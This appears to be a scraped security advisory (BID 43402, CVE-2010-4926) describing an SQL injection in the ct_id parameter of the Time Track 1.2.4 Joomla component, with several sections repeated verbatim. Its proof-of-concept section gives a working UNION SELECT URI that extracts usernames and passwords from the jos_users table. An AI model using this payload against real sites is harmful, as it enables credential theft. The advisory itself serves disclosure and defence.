Time Track Component for Joomla! 'ct_id' Parameter SQL Injection Vulnerability
BID:43402
Info
Time Track Component for Joomla! 'ct_id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 43402 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-4926 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 22 2010 12:00AM |
| Updated: | Oct 11 2011 09:10PM |
| Credit: | Salvatore Fresta aka Drosophila |
| Vulnerable: |
Informationstechnik Ralf Nickel Time Track 1.2.4 |
| Not Vulnerable: | |
Discussion
Time Track Component for Joomla! 'ct_id' Parameter SQL Injection Vulnerability
The Time Track component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Time Track 1.2.4 is vulnerable; other versions may also be affected.
The Time Track component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Time Track 1.2.4 is vulnerable; other versions may also be affected.
Exploit / POC
Time Track Component for Joomla! 'ct_id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/components/index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password)FROM jos_users
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/components/index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password)FROM jos_users
Solution / Fix
Time Track Component for Joomla! 'ct_id' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Time Track Component for Joomla! 'ct_id' Parameter SQL Injection Vulnerability
References:
References:
- Joomla! Homepage (Joomla!)
- Time Track Homepage (Informationstechnik Ralf Nickel )
- TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities (Salvatore Fresta aka Drosophila
)